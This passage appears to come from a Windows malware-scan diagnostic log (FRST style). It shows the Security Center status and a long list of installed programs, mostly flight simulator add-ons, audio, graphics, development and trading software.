WDAGUtilityAccount (S-1-5-21-3967059023-4107875624-2872843465-504 - Limited - Disabled)

==================== Security Center ========================

(If an entry is included in the fixlist, it will be removed.)

AV: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AS: Windows Defender (Enabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installed Programs ======================

(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)

Accu-Sim 182 Skylane for FSX (HKLM-x32\...\Accu-Sim 182 Skylane for FSX) (Version:  - )
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\{55DBEDCF-367F-449E-B90C-43416D468ED1}) (Version: 18.9.15.1 - A2A Simulations Inc.) Hidden
Accu-Sim Bonanza 35 for Flight Simulator X (HKLM-x32\...\Accu-Sim Bonanza 35 for Flight Simulator X 18.9.15.1) (Version: 19.5.24.0 - A2A Simulations Inc.)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.9.1.335 - Adobe Systems Incorporated)
Adobe Flash Player 32 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 32.0.0.223 - Adobe)
Adobe Photoshop CC 2015 (HKLM-x32\...\{793C2BF7-A4FE-4608-91C9-9282C5801C21}) (Version: 16.0 - Adobe Systems Incorporated)
Adobe Premiere (HKLM\...\{C1CB876C-A08E-4692-B525-42848BD154D7}) (Version: 1.0.0000 - Adobe Systems Incorporated) Hidden
Adobe Premiere Pro CC 2017 (HKLM-x32\...\PPRO_11_0_1) (Version: 11.0.1 - Adobe Systems Incorporated)
Aerosoft's - Aerosoft Launcher (HKLM-x32\...\{EE11CFFC-898C-4875-8A63-8B732A9AD43B}) (Version: 1.1.0.1 - Aerosoft)
Aerosoft's - Airbus A320-A321 - FSX STEAM Edition (HKLM-x32\...\Airbus A320-A321 - FSX STEAM Edition) (Version: 1.30 - Aerosoft)
Aerosoft's - Diamond DA20-100 Katana 4X (HKLM-x32\...\{974BF461-4D2C-448A-B05B-502AEA41B7FB}) (Version: 1.04 - Aerosoft)
aerosoft's - FlightSim Commander 9 (HKLM-x32\...\{F941AABE-E868-42D9-9F38-884250F7898A}) (Version: E: - aerosoft)
aerosoft's - Professional Flight Planner X (HKLM-x32\...\{1A5D2729-4A3B-4CD5-85C8-4896FD44B78D}) (Version: 1.15 - aerosoft)
AES Crypt (HKLM\...\{562885D3-41A7-4211-822E-B1B1510069E5}) (Version: 3.10 - Packetizer, Inc.)
Altiverb 6 (HKLM-x32\...\Altiverb 6) (Version:  - )
Apple Application Support (32-bit) (HKLM-x32\...\{5A659BE5-849B-484E-A83B-DCB78407F3A4}) (Version: 7.3 - Apple Inc.)
Apple Application Support (64-bit) (HKLM\...\{F8060941-C0AB-4BCE-88AC-F2FDA2E9F286}) (Version: 7.3 - Apple Inc.)
Apple Mobile Device Support (HKLM\...\{5FA8C4BE-8C74-4B9C-9B49-EBF759230189}) (Version: 12.1.0.25 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{A30EA700-5515-48F0-88B0-9E99DC356B88}) (Version: 2.6.0.1 - Apple Inc.)
Application Verifier x64 External Package (HKLM\...\{B27BC1FC-8474-9E32-73C2-6F7CD58AD1E3}) (Version: 10.1.17763.132 - Microsoft) Hidden
Application Verifier x64 External Package (HKLM\...\{F02CC6FE-37FC-3D47-F961-721D85BAF224}) (Version: 10.1.15063.674 - Microsoft) Hidden
Arena 3.5.1 (HKLM-x32\...\Arena 3.5.1_is1) (Version:  - )
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.14 - Michael Tippach)
AudioEase Altiverb VST RTAS v6.10 (HKLM-x32\...\AudioEase Altiverb VST RTAS_is1) (Version:  - )
Autodesk Maya 2016 (HKLM\...\{3905B678-DC8D-4D5E-AA95-EA254D6C1239}) (Version: 16.0.1312.0 - Autodesk) Hidden
Autodesk Maya 2016 (HKLM\...\Autodesk Maya 2016) (Version: 16.0.1312.0 - Autodesk)
AutoHotkey 1.1.26.01 (HKLM\...\AutoHotkey) (Version: 1.1.26.01 - Lexikos)
Banished (HKLM-x32\...\1207660783_is1) (Version: 2.3.0.7 - GOG.com)
Bonjour (HKLM\...\{56DDDFB8-7F79-4480-89D5-25E1F52AB28F}) (Version: 3.1.0.1 - Apple Inc.)
BS.Player FREE (HKLM-x32\...\BSPlayerf) (Version: 2.72.1082 - AB Team, d.o.o.)
Camtasia 9 (HKLM\...\{B8A4CB7E-7F5B-484F-A127-E4431000EDCE}) (Version: 9.0.4.1948 - TechSmith Corporation) Hidden
Camtasia 9 (HKLM-x32\...\{5957dd25-bb4e-4234-9dc0-b3e10a70f636}) (Version: 9.0.4.1948 - TechSmith Corporation)
Camtasia Studio 8 (HKLM-x32\...\{BFA04EE0-8240-4667-8D53-45496A901C33}) (Version: 8.1.2.1327 - TechSmith Corporation)
Cheat Engine 6.7 (HKLM-x32\...\Cheat Engine 6.7_is1) (Version:  - Cheat Engine)
Cheat Engine 6.8.1 (HKLM-x32\...\Cheat Engine 6.8.1_is1) (Version:  - Cheat Engine)
ChessBase 14 (HKLM-x32\...\{EAC25C55-7C92-451B-94EE-D5BC3932A6A3}) (Version: 14.0.0.0 - ChessBase)
Chessmaster Grandmaster Edition (HKLM-x32\...\{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft) Hidden
Chessmaster Grandmaster Edition (HKLM-x32\...\InstallShield_{27614800-84A9-484E-9CCB-43ED2F1205F5}) (Version: 1.00.0000 - Ubisoft)
ClickOnce Bootstrapper Package for Microsoft .NET Framework (HKLM-x32\...\{D256A5B9-68DA-4F6C-A447-A93E5639A46D}) (Version: 4.7.03083 - Microsoft Corporation) Hidden
Deep Shredder 12 UCI (HKLM-x32\...\{14B6295D-6D03-4635-A17F-76AB10C74EF0}_is1) (Version:  - Stefan Meyer-Kahlen)
Desktop-Reminder 2 (HKLM-x32\...\{288487BA-D8C5-4C81-BD89-C7E49DD48E18}) (Version: 2.128 - Polenter - Software Solutions) Hidden
Desktop-Reminder 2 (HKLM-x32\...\Desktop-Reminder 2) (Version: 2.128 - Polenter - Software Solutions)
DiagnosticsHub_CollectionService (HKLM\...\{440C5592-4EA5-4772-B256-969D66068843}) (Version: 15.9.28016 - Microsoft Corporation) Hidden
DiskProtect190001 version 19.01 (HKLM-x32\...\{6EE85A71-720C-4C73-8920-9BE5B5BF803D}_is1) (Version: 19.01 - )
DisplayDriverAnalyzer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_DisplayDriverAnalyzer) (Version: 397.93 - NVIDIA Corporation) Hidden
Dropbox (HKLM-x32\...\Dropbox) (Version: 85.4.155 - Dropbox, Inc.)
Dropbox Update Helper (HKLM-x32\...\{099218A5-A723-43DC-8DB5-6173656A1E94}) (Version: 1.3.241.1 - Dropbox, Inc.) Hidden
EaseUS MobiMover 4.5 (HKLM-x32\...\EaseUS MobiMover_is1) (Version:  - EaseUS)
E-muPatchMix DSP (HKLM-x32\...\EMU PatchMix DSP) (Version:  - )
Entity Framework 6.2.0 Tools  for Visual Studio 2017 (HKLM-x32\...\{B843915F-00A1-44B1-994C-1AE0A6400AE3}) (Version: 6.2.61807.0 - Microsoft Corporation) Hidden
EPSON L130 Series Printer Uninstall (HKLM\...\EPSON L130 Series) (Version:  - SEIKO EPSON Corporation)
Epson Software Updater (HKLM-x32\...\{7BAC3F7A-B963-468E-982E-B5608A87408D}) (Version: 4.4.4 - SEIKO EPSON CORPORATION)
Equalizer APO (HKLM\...\EqualizerAPO) (Version: 1.2 - )
eReg (HKLM-x32\...\{3EE9BCAE-E9A9-45E5-9B1C-83A4D357E05C}) (Version: 1.20.138.34 - Logitech, Inc.) Hidden
FIFA 19 (HKLM-x32\...\{3391E07D-8484-4124-817E-FCBDA859FD62}) (Version: 1.0.58.64628 - Electronic Arts)
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}) (Version: 16.0.4.403 - FileMaker, Inc.) Hidden
FileMaker Pro 16 (HKLM-x32\...\{13552F4B-487E-49C0-9DCB-A6A3DC74110C}_FileMaker) (Version: 16.0.4.403 - FileMaker, Inc.)
Finale (HKLM\...\{48133FCD-8D55-4D52-A668-D1A988FC00C4}) (Version: 25.0.0.6858 - MakeMusic)
Flight One Software - GTN Series (HKLM-x32\...\F1T182T) (Version: 1.23 - Flight One Software)
FLT 7.0v2 (HKLM-x32\...\FLT 7.0v2_is1) (Version:  - The Foundry)
FMRTE 17.3.1.17 (HKLM\...\{72A84F14-6742-48AD-9B14-E9C1BE155F7A}_is1) (Version: 17.3.1.17 - FMRTE)
FMRTE 18.3.3.26 (HKLM\...\{DDBB4759-2DD1-4003-91B0-219DEF70DF13}_is1) (Version: 18.3.3.26 - FMRTE)
Folder Size (64-bit) (HKLM\...\{F24FF688-7138-4CCF-A83F-71E9FB01170E}) (Version: 2.6 - Brio)
Football Manager 2017 (HKLM\...\Football Manager 2017_is1) (Version: 1.0 - )
Football Manager 2017 Editor (HKLM\...\Football Manager 2017 Editor_is1) (Version: 1.0 - )
Football Manager 2018 (HKLM-x32\...\Football Manager 2018_is1) (Version:  - )
Garmin Aviation Checklist Editor (HKLM-x32\...\{51B555C4-F02B-44A5-8710-8EFE8FCB0589}) (Version: 2.3.0.0 - Garmin Ltd or its subsidiaries)
Garmin GTN Trainer (HKLM-x32\...\{FE8823C2-815A-493B-B3A4-DC2C20268AE8}) (Version: 6.21.0 - Garmin)
Global Prime - MetaTrader 4 (HKLM-x32\...\Global Prime - MetaTrader 4) (Version: 4.00 - MetaQuotes Software Corp.)
Google Earth Pro (HKLM\...\{70A0F34E-564B-4F93-ADD6-3BAEC6E44075}) (Version: 7.3.2.5776 - Google)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.34.11 - Google LLC) Hidden
Greenshot 1.2.10.6 (HKLM\...\Greenshot_is1) (Version: 1.2.10.6 - Greenshot)
Gtk# for .Net 2.12.26 (HKLM-x32\...\{BC25B808-A11C-4C9F-9C0A-6682E47AAB83}) (Version: 2.12.26 - Xamarin, Inc.)
HD Tune Pro 5.50 (HKLM-x32\...\HD Tune Pro_is1) (Version:  - EFD Software)
icecap_collection_neutral (HKLM-x32\...\{A3B4D258-74E1-49D6-9A86-2DFEFEE48DEC}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collection_x64 (HKLM\...\{E524832A-C567-499A-8872-0D79596E4DEE}) (Version: 15.8.27906 - Microsoft Corporation) Hidden
icecap_collectionresources (HKLM-x32\...\{469961DF-482F-4213-ACD4-4AFD443F2A88}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
icecap_collectionresourcesx64 (HKLM-x32\...\{12246E9A-D1A6-4D96-8CEA-CCFD064B16E2}) (Version: 15.8.27924 - Microsoft Corporation) Hidden
Icon Shepherd (HKLM\...\Icon Shepherd_is1) (Version: 19.10.2 - WinAbility Software Corp.)
IDM Crack 6.25 build 25 (HKLM-x32\...\IDM Crack 6.25 build 25) (Version: 5.40 - Crackingpatching.com Team)
InputMapper (HKLM-x32\...\{026D2025-A7FA-4F5C-AF8C-A6F7A9B917FC}) (Version: 1.6.10.19991 - DSDCS)
InputMapper HidGuardian (HKLM-x32\...\{3753F0EF-7F58-4BBA-B4EA-9E1B83C13B97}) (Version: 1.0.6320.17641 - DSDCS)
Intellisense Lang Pack Mobile Extension SDK 10.0.15063.0 (HKLM-x32\...\{87A8879A-3189-4E81-8D1A-0467301C5049}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
IntelliTraceProfilerProxy (HKLM-x32\...\{ACBAA378-519A-441D-9349-C0AAD8DEAD04}) (Version: 15.0.17289.01 - Microsoft Corporation) Hidden
iTools 3 (HKLM-x32\...\ThinkSky) (Version:  - Shenzhen Thinksky Technology Co., Ltd.)
iTunes (HKLM\...\{D9D08A8F-5A03-486A-AD4D-3A438D521F8B}) (Version: 12.9.3.3 - Apple Inc.)
iZotope RX 5 (HKLM-x32\...\iZotope RX 5_is1) (Version: 5.01 - iZotope, Inc.)
Java 8 Update 231 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F64180231F0}) (Version: 8.0.2310.11 - Oracle Corporation)
Java 8 Update 60 (64-bit) (HKLM\...\{26A24AE4-039D-4CA4-87B4-2F86418060F0}) (Version: 8.0.600.27 - Oracle Corporation)
Java SE Development Kit 8 Update 60 (64-bit) (HKLM\...\{64A3A4F4-B792-11D6-A78A-00B0D0180600}) (Version: 8.0.600.27 - Oracle Corporation)
Kits Configuration Installer (HKLM-x32\...\{971E24EB-1096-64A5-10C0-7FD2D3774669}) (Version: 10.1.15063.674 - Microsoft) Hidden
Landing Rate Monitor (HKLM-x32\...\{B946315D-F716-492B-B914-718BC9A5D6D4}_is1) (Version: 4.0.0 - Bobby Allen)
Lexikon Sonate version 5.0 (HKLM-x32\...\Lexikon Sonate_is1) (Version: 5.0 - )
LLH5X (HKLM-x32\...\LLH5X) (Version:  - )
LLH7X (HKLM-x32\...\LLH7X) (Version:  - )
LLH8X (HKLM-x32\...\LLH8X) (Version:  - )
LLH-Heli (HKLM-x32\...\LLH-Heli) (Version:  - )
Logitech Options (HKLM\...\LogiOptions) (Version: 6.90.131 - Logitech)
Logitech SetPoint 6.69 (HKLM\...\sp6) (Version: 6.69.123 - Logitech)
loopMIDI (HKLM-x32\...\{55c0d955-4cee-452c-b393-d4c020a967d7}) (Version: 1.0.13.24 - Tobias Erichsen)
loopMIDI (HKLM-x32\...\{9E69C6CD-820A-44A9-9A0A-B7A56AD62A1E}) (Version: 1.0.13.24 - Tobias Erichsen) Hidden
loopMIDIBlockLegacy (HKLM-x32\...\{AEAF7978-3204-451D-8593-BC53EBDDA31D}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
Macro Recorder 5.7.1 (HKLM-x32\...\Macro Recorder_is1) (Version: 5.7.1 - Jitbit Software)
Malwarebytes version 4.0.4.49 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 4.0.4.49 - Malwarebytes)
Mari 2.5v2 (HKLM\...\Mari 2.5v2_is1) (Version:  - The Foundry)
Max 7 (64-bit) (HKLM\...\{AB97A2FF-BA6F-4B15-8032-FF9A331AFF77}) (Version: 7.0.3 - Cycling '74)
MaxScore (HKLM-x32\...\MaxScore 0.8.41) (Version: 0.8.41 - maxscore)
MayaBonusTools (HKLM\...\{367B88BA-C90B-A1D3-81BA-7C5407698472}) (Version: 17.0.1 - Autodesk, Inc.)
Melodyne 3.1 (HKLM-x32\...\{9D623E1A-30E1-4E55-BD80-5C1359DB120B}) (Version: 3.1.0200 - Celemony Software GmbH) Hidden
Melodyne 3.1 (HKLM-x32\...\{A1F143D1-1F0D-44FB-A44B-71D4367D16DE}) (Version: 3.1.0200 - Celemony Software GmbH)
mental ray renderer for Autodesk Maya 2016 (HKLM\...\{59AC9438-6EE3-4B22-860F-525308329228}) (Version: 16.0.1312.0 - mental ray)
MetaStock 11.0 (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\MetaStock 11.0) (Version:  - )
Microsoft .NET Core SDK 2.1.509 (x64) (HKLM-x32\...\{305c8a42-62c1-4b59-b53f-09a9f066fd44}) (Version: 2.1.509 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.60905.0 (HKLM-x32\...\{D1AC9B0B-2727-4811-91DC-1FC3C4E47A9B}) (Version: 10.0.60905.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61242.0 (HKLM-x32\...\{85DF6786-66AA-42EE-8616-AE456B07BD99}) (Version: 10.0.61242.0 - Microsoft Corporation)
Microsoft Flight Simulator SimConnect Client v10.0.61259.0 (HKLM-x32\...\{D61CA184-3F6D-4A50-B2CC-7A18447D6A8D}) (Version: 10.0.61259.0 - Microsoft Corporation)
Microsoft Flight Simulator X Steam Edition (HKLM-x32\...\Microsoft Flight Simulator X Steam Edition_is1) (Version:  - )
Microsoft Office Professional Plus 2016 - el-gr (HKLM\...\ProplusRetail - el-gr) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft Office Professional Plus 2016 - en-us (HKLM\...\ProplusRetail - en-us) (Version: 16.0.12228.20250 - Microsoft Corporation)
Microsoft OneDrive (HKU\.DEFAULT\...\OneDriveSetup.exe) (Version: 18.151.0729.0013 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\OneDriveSetup.exe) (Version: 19.222.1110.0002 - Microsoft Corporation)
Microsoft SQL Server 2012 Express LocalDB  (HKLM\...\{E75776B2-EAE5-42F9-A800-0A10763DEDF0}) (Version: 11.0.2318.0 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM\...\{98DD6908-C582-452A-954D-E79E6DF0310A}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft System CLR Types for SQL Server vNext CTP1.6 (HKLM-x32\...\{640EECB8-1962-4D23-ACB2-310107EC7ED9}) (Version: 15.0.600.33 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{6ce5bae9-d3ca-4b99-891a-1dc6c118a5fc}) (Version: 8.0.59192 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.21022 (HKLM\...\{350AA351-21FA-3270-8B7A-835434E766AD}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022 (HKLM-x32\...\{FF66E9F6-83E7-3A3E-AF14-8DE9A809A6A4}) (Version: 9.0.21022 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{9634d50a-0c4d-4f52-8a9f-894a2baae370}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.60610 (HKLM-x32\...\{a1909659-0a08-4554-8af1-2175904903a1}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{307a22b8-8353-4c5e-b67b-2404c5734558}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.60610 (HKLM-x32\...\{95716cce-fc71-413f-8ad5-56c2892d4b3a}) (Version: 11.0.60610.1 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.40660 (HKLM-x32\...\{ef6b00ec-13e1-4c25-9064-b2f383cb8412}) (Version: 12.0.40660.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.16.27033 (HKLM-x32\...\{cc3a7c63-31fb-4129-9024-63ebefd86a95}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.16.27033 (HKLM-x32\...\{624ba875-fdfc-4efa-9c66-b170dfebc3ec}) (Version: 14.16.27033.0 - Microsoft Corporation)
Microsoft Visual Studio Installer (HKLM\...\{6F320B93-EE3C-4826-85E0-ADF79F8D4C61}) (Version: 1.18.1104.625 - Microsoft Corporation)
MMFonts (HKLM-x32\...\{1DD5D3E6-8DF5-4657-8825-713C499CDCC0}) (Version: 1.1.1.1 - MakeMusic, Inc.)
Mozilla Firefox 61.0.2 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 61.0.2 (x86 en-US)) (Version: 61.0.2 - Mozilla)
Mozilla Firefox 70.0.1 (x64 en-US) (HKLM\...\Mozilla Firefox 70.0.1 (x64 en-US)) (Version: 70.0.1 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 64.0.2 - Mozilla)
Mp3tag v2.84a (HKLM-x32\...\Mp3tag) (Version: 2.84a - Florian Heidenreich)
MSI Development Tools (HKLM-x32\...\{577FB968-1AAC-A315-93D6-419725A69F36}) (Version: 10.1.15063.674 - Microsoft Corporation) Hidden
MSI Development Tools (HKLM-x32\...\{6C961B30-A670-8A05-3BFE-3947E84DD4E4}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
MSXML 4.0 SP2 Parser and SDK (HKLM-x32\...\{716E0306-8318-4364-8B8F-0CC4E9376BAC}) (Version: 4.20.9818.0 - Microsoft Corporation)
Native Instruments Kontakt 5 (HKLM-x32\...\Native Instruments Kontakt 5) (Version: 5.7.3.37 - Native Instruments)
Network Addon Mod (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\Network Addon Mod) (Version: 36 - The NAM Team)
Notepad++ (32-bit x86) (HKLM-x32\...\Notepad++) (Version: 7.5.8 - Notepad++ Team)
NovaGOPlayer 7.3.3 (HKLM-x32\...\89399A59-11C3-4EBC-A59E-FBD13021BC07_is1) (Version: 7.3.3 - Forthnet Media SA)
NVAPI Monitor plugin for NvContainer (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_NvContainer.NvapiMonitor) (Version: 1.15 - NVIDIA Corporation) Hidden
NVIDIA 3D Vision Controller Driver 390.41 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.NVIRUSB) (Version: 390.41 - NVIDIA Corporation)
NVIDIA 3D Vision Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.3DVision) (Version: 397.93 - NVIDIA Corporation)
NVIDIA GeForce Experience 3.19.0.94 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.GFExperience) (Version: 3.19.0.94 - NVIDIA Corporation)
NVIDIA Graphics Driver 397.93 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.Driver) (Version: 397.93 - NVIDIA Corporation)
NVIDIA HD Audio Driver 1.3.37.4 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_HDAudio.Driver) (Version: 1.3.37.4 - NVIDIA Corporation)
NVIDIA PhysX System Software 9.17.0524 (HKLM\...\{B2FE1952-0186-46C3-BAEC-A80AA35AC5B8}_Display.PhysX) (Version: 9.17.0524 - NVIDIA Corporation)
OANDA - MetaTrader (HKLM-x32\...\OANDA - MetaTrader) (Version: 4.00 - MetaQuotes Software Corp.)
OANDA Desktop (HKLM-x32\...\{1DAF3BB8-E27F-4698-9D7C-270985AA3BCE}) (Version: 2.6.3 - OANDA)
Office 16 Click-to-Run Extensibility Component (HKLM-x32\...\{90160000-008C-0000-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Extensibility Component 64-bit Registration (HKLM\...\{90160000-00DD-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Licensing Component (HKLM\...\{90160000-008F-0000-1000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0408-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
Office 16 Click-to-Run Localization Component (HKLM-x32\...\{90160000-008C-0409-0000-0000000FF1CE}) (Version: 16.0.12228.20250 - Microsoft Corporation) Hidden
PACE License Support Win64 (HKLM\...\{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.) Hidden
PACE License Support Win64 (HKLM-x32\...\InstallShield_{72ad9d51-0903-4fe7-af5d-33b3185fa6e9}) (Version: 2.4.2.0737 - PACE Anti-Piracy, Inc.)
PCM Native Reverb VST Plug-in (HKLM-x32\...\{B4691C58-2A6A-4AFA-960E-AEB767639E44}) (Version: 1.0.0 - Lexicon) Hidden
PCM Native Reverb VST Plug-in (HKLM-x32\...\PCM Native Reverb VST Plug-in) (Version:  - Lexicon)
PDFCreator (HKLM\...\{0001B4FD-9EA3-4D90-A79E-FD14BA3AB01D}) (Version: 2.5.2 - pdfforge GmbH)
PMDG 737 8900 NGX Base Package FSX (HKLM-x32\...\{20708FD5-E94D-4097-A21E-E28564CDBC06}) (Version: 1.10.6436 - PMDG Simulations, LLC.)
PureSync (HKLM-x32\...\{728DB5F9-AFAC-4027-B0A0-4194D89328E4}) (Version: 4.7.3 - Jumping Bytes)
qBittorrent 4.1.6 (HKLM-x32\...\qBittorrent) (Version: 4.1.6 - The qBittorrent project)
Quick Search 5.28.1.101 (HKLM-x32\...\Quick Search) (Version: 5.28.1.101 - Glarysoft Ltd)
QuickTime 7 (HKLM-x32\...\{FF59BD75-466A-4D5A-AD23-AAD87C5FD44C}) (Version: 7.79.80.95 - Apple Inc.)
RapidMiner Studio (HKU\S-1-5-21-3967059023-4107875624-2872843465-1001\...\RapidMiner Studio) (Version: 7.6.1.0 - RapidMiner)
RealAir Turbine Duke (HKLM\...\Turbine Duke07.1.10.35) (Version: 07.1.10.35 - RealAir Simulations)
REAPER (x64) (HKLM\...\REAPER) (Version:  - )
Revolution DB Master 19 Beta 1 (HKLM-x32\...\Revolution DB Master 19_is1) (Version:  - FIFA MASTER)
REX 4 - Weather Architect (HKLM-x32\...\{1D59EFDF-0A58-4FF9-A468-A1190F1FAFEB}) (Version: 4.0.2015.0717 - REX Game Studios, LLC.)
rtpMIDIBlockLegacy (HKLM-x32\...\{FD937297-84C3-41A5-B5DF-1FAEEE669D68}) (Version: 9.9.9.9 - Tobias Erichsen) Hidden
SafeZone Stable 3.55.2393.609 (HKLM-x32\...\SafeZone 3.55.2393.609) (Version: 3.55.2393.609 - Avast Software) Hidden
Sandboxie 5.30 (64-bit) (HKLM\...\Sandboxie) (Version: 5.30 - Sandboxie Holdings, LLC)
Scid vs PC 4.18 (HKLM-x32\...\Scid vs PC_is1) (Version: 4.18 - Steven Atkinson)
Screen Protractor (HKLM-x32\...\Screen Protractor) (Version: 4.0 - Iconico)
SDK ARM Additions (HKLM-x32\...\{0B5D6FB7-05A5-271B-5B99-82384219A471}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SDK ARM Redistributables (HKLM-x32\...\{4A5F6E94-7967-A333-8231-CA9AF35E03BD}) (Version: 10.1.17763.132 - Microsoft Corporation) Hidden
SimCity (HKLM-x32\...\SimCity_R.G. Mechanics_is1) (Version:  - R.G. Mechanics, markfiter)
SimCity 4 Deluxe Edition (HKLM-x32\...\GOGPACKSC4_is1) (Version: 2.0.0.8 - GOG.com)
Steam (HKLM-x32\...\Steam) (Version: 2.10.91.91 - Valve Corporation)
SumatraPDF (HKLM\...\SumatraPDF) (Version: 3.1.2 - Krzysztof Kowalczyk)
TeamViewer 13 (HKLM-x32\...\TeamViewer) (Version: 13.2.36215 - TeamViewer)
teVirtualMIDI64 (HKLM\...\{9084640A-366B-4C44-BDB1-74864B460B13}) (Version: 1.2.10.38 - Tobias Erichsen) Hidden
thinkorswim (HKLM\...\9968-4488-2169-7623) (Version: desktop - thinkorswim, Inc)
